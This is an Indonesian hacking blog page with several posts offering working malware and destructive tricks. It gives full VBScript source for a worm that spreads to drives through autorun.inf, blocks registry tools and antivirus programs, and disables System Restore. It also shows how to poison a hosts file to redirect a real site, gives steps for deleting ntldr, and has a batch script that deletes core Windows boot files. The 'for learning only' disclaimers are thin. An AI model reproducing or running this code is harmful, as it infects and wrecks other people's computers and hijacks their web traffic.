Jumat, 27 Juli 2012



Blog ini

Di-link Dari Sini

Web http://www.deathuz.tk

Blog ini
cps-hacker


Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.
Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Virus scrip ini hampir mirip dengan virus Sality yang mana k

erjanya merusak Registri / Regedit, selain itu juga Virus ini menyebarkan Infeksi2 ke Hardrive2 yang ada di PC. Tapi Virus ini tidak menginfeksi file yang berekstensi .exe dan lain2 seperti Virus Sality.

Cara membuat virus ini cukup mudah:
  1. Pertama-tama buka notepad,
  2. Kemudian copas (copy-paste) script di bawah ini kedalam notepad,
  3. Kemudian pilih Save As,
  4. Simpan dengan format Fakry.vbs.

Peringatan kalau script sudah di simpat dengan akhiran / format .vbs berarti virus script sudah aktif.
Kalau ingin menyimpan Script di komputer/flasdisk kamu, simpat dengan format .txt contoh: Fakry.txt

--------------------------------------script awal---------------------------------------

On error resume next

Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd



'Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"

Set you = createobject("scripting.filesystemobject")

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

Do



'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)

Set jatiya = you.getspecialfolder(1)

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 32

Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 39



'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives



If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then



Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")

Tf.attributes =32

Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &"\vhck3d.vbs")

Tf.attributes = 39



Set tf =you.getfile(loph.path &"\autorun.inf")

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &"\autorun.inf")

Tf.attributes=39

End if

Next



'Manipulasi registry

Set vhck3d = createobject("wscript.shell")



'Banyak yang dirubah..liat ndiri deh aaah



Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"



If check <> 1 thenWscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject("wscript.shell")

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

--------------------------------------- akhir Script-----------------------------------------

Penjelasan : Yang saya tandai dengan warna kuning adalah penjelasan fungsi dari Script Virus ini.Seperti: Manipulasi registry Dan di bawahnya adalah Virus Scriptnya, dari perintah untuk memanipulasi Registry.
Read More

DNS Host URL File Hacking

Pernah kebayang gak saat kita mau buka website A tiba2 yang muncul malah website B, tapi anehnya Url nya adalah alamat website A ? wah…pikiran kita pasti langsung ke virus atau spyware, belum tentu, bisa aja ada seseorang yang iseng <baca:hacker> telah menyusup ke system kita dan merubah file host untuk di arahkan ke Url yang dia kehendaki
Terus Gimana caranya ? cekicrot….
1. Buka cmd kamu dengan cara masuk menu run→cmd trus enter
2. Kalau udah masuk ketikkan
cd\windows\system32\drivers\etc
Seperti gambar di bawah ini :
Photobucket
3.  Cek dulu isi file hosts nya dengan perintah type hosts maka akan muncul seperti gambar dibawah ini
Photobucket
4. Muncul kan isi dari file hosts, terus gimana cara ngrubahnya ? gini caranya…ping dulu alamat yang mau dijadikan pengubah url target. Disini saya ambil contoh : www.kompas.co.id
Photobucket
5.  Nah, dapetkan IP nya.  tinggal nentuin sasarannya, website sasaran saya adalah www.jasaraharja.co.id, kalian boleh website apa aja.
6. jadi perintahnya adalah :
echo 202.146.4.100 www.jasaraharja.co.id >> hosts
trus enter deh.
Photobucket
7. Coba cek lagi di hosts nya tadi dengan perintah type hosts dah muncul kan perubahan
yang kita lakukan tadi…
Photobucket
Read More

  • (Tutorial) Cara merusak sistem operasi Windows komputer dengan cepat

    Kali ini, saya akan membagikan satu tips jahil yang bakal membuat pemilik komputer yang anda jahili bakal murka melihat sistem operasinya rusak dan tidak mau booting lagi kedalam sistem operasi.

    Trik ini berlaku untuk sistem operasi Windows, saya sebagai penulis tidak bertanggung jawab atas kerusakan dan kemurkaan untuk anda yang melakukannya. Yang jelas, tujuan saya disini hanya membagikan sebuah tips rahasi bagaimana merusak sistem operasi Windows dengan cepat.


    1. Oke, yang pertama pada Menubar Windows Explorer coba masuk opsi TOOL > FOLDER OPTION.
    2. Klik tab VIEW, lalu cari opsi yang bertuliskan HIDE PROTECTED OPERATING SYSTEM FILES (RECOMMENDED) , hilangkan tanda centangnya. Jika muncul peringatan, klik saja YES.




    3. Lalu klik APPLY dan Ok.
    4. Masuk kepartisi C:\ dimana biasanya kita menginstall windows disana, cari file bernama "ntldr", hapus file tersebut.
    5. Restart komputer kamu, dan lihat hasilnya. Saat booting akan memunculkan pesan "NTDLR  IS MISSING'





    6. Nah tips merusak pun selesai.

    Warning: Jangan pernah menggunakan cara kotor ini untuk mengeruk keuntungan, sekali lagi disini saya hanya membagikan tips agar supaya kita mengenali gejala kerusakan. NTDLR sendiri adalah salah satu inti dari sistem operasi, jika OS kamu mengalami NTDLR is missing, ada kemungkinan file kecil ini bisa saja terhapus tanpa sengaja atau mengalami crash pada sistem operasi.



Read More
Read More

Selasa, 22 Mei 2012

Cara Membuat Keylogger Dengan Visual Basic


Sesuai dengan judul di atas, kali ini saya akan memberikan sedikit tutorial cara membuat key logger sederhana dengan Visual Basic. Oke langsung saja gan..


1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
2. Buka program Visual Basic
3. New Project Standard EXE


Read More

script - script Virus notepad berbahaya yang berekstensi .VBS

DI SINI ADA R beberapa script VIRUS EXCELLENT script Webs PALING BERBAHAYA JUGA TERCANTUM DALAM MEREKA

Bagaimana untuk crash PC Selamanya! :::
@ Echo off
attrib-r-s-hc: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-hc: \ boot.ini
del c: \ boot.ini
attrib-r-s-hc: \ ntldr
del c: \ ntldr
attrib-r-s-hc: \ windows \ win.ini
del c: \ windows \ win.ini
 
Buka notepad dan copy dan paste. Simpan sebagai file. bat
Read More
 
cps-hacker © 2011 Templates | D-pex